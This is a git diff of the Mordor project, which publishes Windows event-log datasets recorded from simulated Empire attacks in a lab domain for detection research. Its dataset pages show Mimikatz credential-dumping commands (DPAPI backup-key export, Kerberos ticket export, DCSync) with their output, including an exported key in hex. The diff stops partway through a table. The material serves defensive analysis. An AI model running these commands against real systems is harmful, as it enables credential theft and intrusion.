diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 00000000..2fede57f --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,110 @@ +# Changelog + +## Verion 0.0.2 +---------------------------------- + +[Full Changelog](https://github.com/Cyb3rWard0g/mordor/compare/0.0.1...0.0.2) + +### Fixed: +**defense evesion** + +* Process Injection + * Empire PsInject + +### Added: +**Credential Access** + +* Credential Dumping + * Empire Mimikatz Export Master Key + * Empire Mimikatz Extract Tickets + * Empire Mimikatz Lsadump + * Empire Powerdump + +**Defense Evasion** + +* Modify Registry + * Empire Enable RDP + * Empire Wdigest Downgrade + +* Process Injection + * Empire Dll Injection + +* Trusted Developer Utilities + * Empire Invoke Msbuild + +**Discovery** + +* Account Discovery + * Empire Fin-LocalAdminAccess + * Empire Net User Domain SPecific + +* System Network Connections Discovery + * Empire Get Session Local + * Empire Get Session DC + +* System Service Discovery + * Empire Net Start + * Empire Powerup All Checks + +**Execution** + +* PowerShell + * Empire Invoke Psremoting +* Service Execution + * Empire Invoke Psexec +* Windows Management Instrumentation + * Empire Invoke wmi debugger + * Empire wmic add user backdoor + +**Lateral Movement** + +* Distributed Component Object Model + * Empire Invoke DCOM +* Trusted Developer Utilities + * Empire Invoke Msbuild +* Windows Admin Shares + * Empire Infoke Smbexec +* PowerShell + * Empire Invoke Psremoting +* Service Execution + * Empire Invoke Psexec +* Windows Management Instrumentation + * Empire Invoke wmi debugger + * Empire wmic add user backdoor + +**Persistence** + +* Registry Run + * Empire Elevated Registry +* Scheduled Tasks + * Empire Elevated Schtasks +* WMI Event Subscription + * Empire Elevated WMI + +**Privilege Escalation** + +* Access Token Manipulation + * Empire Invoke Runas +* Bypass UAC + * Empire Ask + +### Updated: +**Execution** + +* Windows Management Instrumentation + * Empire Invoke-Wmi + +**Credential Access** + +* Credential Dumping + * Empire Mimikatz logonpasswords + +**Discovery** + +* Permissions Group Discovery + * Empire Net Domain Admins + +**Execution** + +* Scripting + * Empire Launcher Vbs \ No newline at end of file diff --git a/README.md b/README.md index eeaf9d59..f18ce6b5 100644 --- a/README.md +++ b/README.md @@ -20,47 +20,6 @@ The name **Mordor** comes from the awesome book/film series "[The Lord of the Ri * Ingest known bad data samples for training and capture the flag (CTF) events. * Learn more about red team simulation exercises and technology such as Kafkacat, Kafka and Jupyter Notebooks. -# Why Mordor? - -Think about an attack that you want to test in your lab environment. -Let's say we want to emulate an adversary using a non-domain-controller-account abusing the use of Active Directory replication services to optain the NTLM hash of user. -What do we do if we want to automate and expedite the emulation process? Usually the following might happen: - -* Google for "DCSync" to look for the right script or red team simulation toolkit/project to execute the attack. -* Find that it can be done via several programming languages and several tools out there. -* Pick a "variant". In this case let's say we pick the Invoke-Mimikatz script from Powershell Empire. -* Test the adversarial technique. -* Document relevant data sources. At the endpoint level, the main behavior produces specific Windows Security events (Event ID 4662). -* Consider other variants and try another way to accomplish the main adversarial objective. -* Test another basic variant via another atomic red teaming toolkit. At the endpoint level, the main behavior produces the same Windows Security events (Events ID 4662). -* Learn and test new ways to execute the adversarial technique (i.e .NET) and run it again. -* At the endpoint level, the main behavior produces again the same Windows Security events (Events ID 4662). - -In my basic DCSync test I was using a user with replication permissions to initiate an ad replication operation. -The user name was ``Mmidge``. -I was getting one of the following events: - - - -## What is going on here? - -Most of the time, depending on the detection goal, it does not matter what tool or programming language I use to emulate the adversarial technique or how many times I execute the attack, I still get the same event logic, pattern or relevant data. - -From my basic example, I ask myself these question: - -* What is my main goal? -* Do I want to primarily detect .NET behavior or the behavior of a non-domain-controller account abusing ad replication services?. - -Do not get me wrong, the extra context of the execution method or the technique enabler is also valuable. -However, I believe that we can expedite the emulation of an adversarial technique by giving you the relevant data and pattern directly and go straight to the analysis phase of your threat detection strategy. - -## Do I ONLY get the events related to the adversarial techniques? - -* You get the potential relevant events and the extra context produced by other security events that get created during the time window of the log collection. -* This is valuable if you want to explore other ways to enrich your data analytic and use extra context from events from different data sources. -* For example, you also get events of the command and control communication from the endpoint which can then be mapped to the specific adversarial technique you are analyzing. -* In addition, depending on the type of dataset you use, you get more context. Learn more about them in our [documentation here](https://mordor.readthedocs.io/en/latest/mordor_categorization.html) - # Getting Started * Mordor Environments @@ -100,7 +59,7 @@ There are a few things that we would like to accomplish with this repo as shown - [ ] Share Terraform & Packer config files to deploy the same environment in the cloud - [ ] Add a Bro sensor - [ ] Multiple custom network setup for contributions -- [ ] Prepare Large Dataset ;) -- [ ] Logo +- [X] Prepare Large Dataset ;) +- [X] Logo More coming soon... \ No newline at end of file diff --git a/docs/source/_static/empire_ask.png b/docs/source/_static/empire_ask.png new file mode 100644 index 00000000..4d10a00f Binary files /dev/null and b/docs/source/_static/empire_ask.png differ diff --git a/docs/source/_static/empire_launcher_vbs.png b/docs/source/_static/empire_launcher_vbs.png index 7bf221eb..ed0caa44 100644 Binary files a/docs/source/_static/empire_launcher_vbs.png and b/docs/source/_static/empire_launcher_vbs.png differ diff --git a/docs/source/network_shire.rst b/docs/source/network_shire.rst index 52277c55..0543bad6 100644 --- a/docs/source/network_shire.rst +++ b/docs/source/network_shire.rst @@ -15,23 +15,23 @@ Network Design :alt: The Shire Design :scale: 35% -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Platform | Version | Purpose | Name | IP Address | Main User | -+===========+=============+===============+===========+===============+===============+ -| Windows | Win 2016 | DC | HFDC1 | 172.18.39.5 | Administrator | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | HR001 | 172.18.39.106 | nmartha | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | IT001 | 172.18.39.105 | pgustavo | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 10 | Client | ACCT001 | 172.18.39.100 | lrodriguez | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Windows | Win 2016 | Win Collector | WECServer | 172.18.39.102 | wecserver | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Linux | HELK 0.1.7 | Log Collector | helk | 10.0.10.102 | helk | -+-----------+-------------+---------------+-----------+---------------+---------------+ -| Linux | Kali 2018.4 | Red Team C2 | kali | 10.0.10.106 | wardog | -+-----------+-------------+---------------+-----------+---------------+---------------+ ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Platform | Version | Purpose | FQDN | IP Address | Main User | ++===========+=============+===============+=====================+===============+===============+ +| Windows | Win 2016 | DC | HFDC1.shire.com | 172.18.39.5 | Administrator | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | HR001.shire.com | 172.18.39.106 | nmartha | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | IT001.shire.com | 172.18.39.105 | pgustavo | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 10 | Client | ACCT001.shire.com | 172.18.39.100 | lrodriguez | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Windows | Win 2016 | Log Collector | WECServer.shire.com | 172.18.39.102 | wecserver | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Linux | HELK 0.1.7 | Data Analysis | helk | 10.0.10.102 | helk | ++-----------+-------------+---------------+---------------------+---------------+---------------+ +| Linux | Kali 2018.4 | Red Team C2 | kali | 10.0.10.106 | wardog | ++-----------+-------------+---------------+---------------------+---------------+---------------+ Data Sources Collected ###################### diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md index 9abee6d9..270b6129 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/README.md @@ -4,6 +4,6 @@ An adversary with enough permissions can abuse active directory services to acce ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_dcsync](./empire_dcsync.md) | 2019-03-01174830 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_dcsync](./empire_dcsync.md) | 2019-03-01174830 | \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md index cfeff480..48caef48 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_ad/empire_dcsync.md @@ -1,4 +1,3 @@ - # Empire DCSync An adversary with replication permissions (default in Domain Admins) can use the active directory replication apis to pull the NTLM hash of any user in the network. @@ -78,7 +77,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2325 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 6 | -## Empire Activity +## Attacker Activity ``` usemodule credentials/mimikatz/dcsync diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md index 85616193..b05be781 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/README.md @@ -4,6 +4,8 @@ An adversary can grab credentials from the memory contents of processes such as ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_mimikatz_logonpasswords](./empire_mimikatz_logonpasswords.md) | 019-03-19130532 | +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_mimikatz_logonpasswords](./empire_mimikatz_logonpasswords.md) | 2019-05-18202151 | +| shire | [empire_mimikatz_extract_tickets](./empire_mimikatz_extract_tickets.md) | 2019-05-18230752 | +| shire | [empire_mimikatz_export_master_keys](./empire_mimikatz_export_master_key.md) | 2019-05-18235535 | diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md new file mode 100644 index 00000000..7d030df5 --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.md @@ -0,0 +1,106 @@ +# Empire Mimikatz Export Master Key + +Data Protection Application Programming Interface (DPAPI) is used by Windows to securely protect passwords saved by browsers, encrypted files, and other sensitive data. Domain controllers hold a master key that can decrypt all secrets on domain-joined Windows machines. Mimikatz can be used to export the master key from the domain controller remotely. + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_export_master_key.tar.gz](./empire_mimikatz_export_master_key.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18235535 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 2228 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Microsoft-Windows-GroupPolicy | na | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 217 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 132 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 132 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 36 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 15 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 14 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 12 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 11 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 9 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 7 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Plug and Play Events | 2 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | +| Security | Microsoft-Windows-Security-Auditing | DPAPI Activity | 1 | +| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 405 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 258 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 254 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 211 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 87 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 77 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 39 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 1995 | + +## Attacker Activity + +``` +(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:HFDC01.shire.com /export +(Empire: powershell/credentials/mimikatz/command) > execute +[*] Tasked 13GK9C5T to run TASK_CMD_JOB +[*] Agent 13GK9C5T tasked with task ID 1 +[*] Tasked agent 13GK9C5T to run module powershell/credentials/mimikatz/command +(Empire: powershell/credentials/mimikatz/command) > Job started: DPB5F4 +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # lsadump::backupkeys /system:HFDC01.shire.com /export + +Current prefered key: {a1b58ded-16ec-4822-ab1c-3a4cfb9c268a} + * RSA key + Exportable key : YES + Key size : 2048 + Private export : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.pvk' + PFX container : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.pfx' + Export : OK - 'ntds_capi_0_a1b58ded-16ec-4822-ab1c-3a4cfb9c268a.der' + +Compatibility prefered key: {116228fd-901d-4386-853a-9611c3c93e28} + * Legacy key +aff6c7adc1e0ddc685fae1fd657a1f6756df313f9b149f4af78949700de1022f +e921157be464fc5cd40ceec73694e565bcab123780f285a5cd678af40cf5f0bb +ec9e6b981966d12e5a7de25073fbb716a0e435d1dfee8c55bf5725172161f9d3 +06f4e00ffa1bc37de63719a7e5173ce20b69dc2764664535435aab7afbc1d332 +f0c7837839ab891efcb6dc9490746d35aab45efc5e72a7270186ae0260d1ad0f +28e5cbe391c9df45dd38e7e5681df55a216a2d50e4de0d8cdd33dde8806569ee +fe3e906081c4d1c18e4f42461133a2646fce2a37773ea15bbaae5fef01c0997e +f19dcfaf5582ab001056b8fe921c5f5c896f145fef1dfeda8ebe9ef4fd4fccdb + + Export : OK - 'ntds_legacy_0_116228fd-901d-4386-853a-9611c3c93e28.key' + +(Empire: powershell/credentials/mimikatz/command) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz new file mode 100644 index 00000000..41578267 Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_export_master_key.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md new file mode 100644 index 00000000..6fc296dd --- /dev/null +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.md @@ -0,0 +1,159 @@ +# Empire Mimikatz Extract Tickets + +PowerSploit's Invoke-Mimikatz function to extract kerberos tickets from memory in base64-encoded form. + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_mimikatz_extract_tickets.tar.gz](./empire_mimikatz_extract_tickets.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18230752 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1854 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 303 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 268 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 60 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 16 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 16 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 15 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 14 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 521 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 274 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 190 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 77 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 51 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2294 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/mimikatz/extract_tickets +(Empire: powershell/credentials/mimikatz/extract_tickets) > info + + Name: Invoke-Mimikatz extract kerberos tickets. + Module: powershell/credentials/mimikatz/extract_tickets + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @JosephBialek + @gentilkiwi + +Description: + Runs PowerSploit's Invoke-Mimikatz function to extract + kerberos tickets from memory in base64-encoded form. + +Comments: + http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/credentials/mimikatz/extract_tickets) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 39 +[*] Tasked agent TKV35P8X to run module powershell/credentials/mimikatz/extract_tickets +(Empire: powershell/credentials/mimikatz/extract_tickets) > Job started: YG28AV +Hostname: HR001.shire.com / S-1-5-21-2511471446-1103646877-3980648787 + + .#####. mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02 + .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition ** + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +mimikatz(powershell) # standard::base64 +isBase64InterceptInput is false +isBase64InterceptOutput is false + +mimikatz(powershell) # kerberos::list /export + +[00000000] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 7:03:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : krbtgt/SHIRE.COM @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; + * Saved to file : 0-60a10000-nmartha@krbtgt~SHIRE.COM-SHIRE.COM.kirbi + +[00000001] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:33 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : krbtgt/SHIRE.COM @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; + * Saved to file : 1-40e10000-nmartha@krbtgt~SHIRE.COM-SHIRE.COM.kirbi + +[00000002] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 7:03:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : cifs/HFDC01.shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 2-40a50000-nmartha@cifs~HFDC01.shire.com-SHIRE.COM.kirbi + +[00000003] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:54:14 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : ldap/HFDC01.shire.com/shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 3-40a50000-nmartha@ldap~HFDC01.shire.com~shire.com-SHIRE.COM.kirbi + +[00000004] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:32:04 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : HOST/HFDC01 @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 4-40a50000-nmartha@HOST~HFDC01-SHIRE.COM.kirbi + +[00000005] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:48 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : cifs/IT001 @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; + * Saved to file : 5-40a10000-nmartha@cifs~IT001-SHIRE.COM.kirbi + +[00000006] - 0x00000012 - aes256_hmac + Start/End/MaxRenew: 5/18/2019 6:23:33 PM ; 5/19/2019 4:23:33 AM ; 5/25/2019 6:23:33 PM + Server Name : ldap/HFDC01.shire.com @ SHIRE.COM + Client Name : nmartha @ SHIRE.COM + Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; + * Saved to file : 6-40a50000-nmartha@ldap~HFDC01.shire.com-SHIRE.COM.kirbi + +(Empire: powershell/credentials/mimikatz/extract_tickets) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz new file mode 100644 index 00000000..65e9b377 Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_extract_tickets.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md index 90071aeb..d35d7195 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_memory/empire_mimikatz_logonpasswords.md @@ -16,57 +16,83 @@ Shire ## Time Taken -019-03-19130532 +2019-05-18202151 ## About this file | log_name | source_name | task | record_number | |--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 2343 | +| Windows PowerShell | PowerShell | Pipeline Execution Details | 1558 | | Windows PowerShell | PowerShell | Provider Lifecycle | 8 | | Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 335 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 275 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 148 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 10 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 8 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 154 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 112 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 28 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 9 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 8 | | Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 8 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 7 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 7 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | | Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 6 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 3 | +| Security | Microsoft-Windows-Security-Auditing | Directory Service Access | 1 | | Security | Microsoft-Windows-Security-Auditing | File Share | 1 | -| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1520 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 1480 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 994 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 286 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 180 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 70 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: 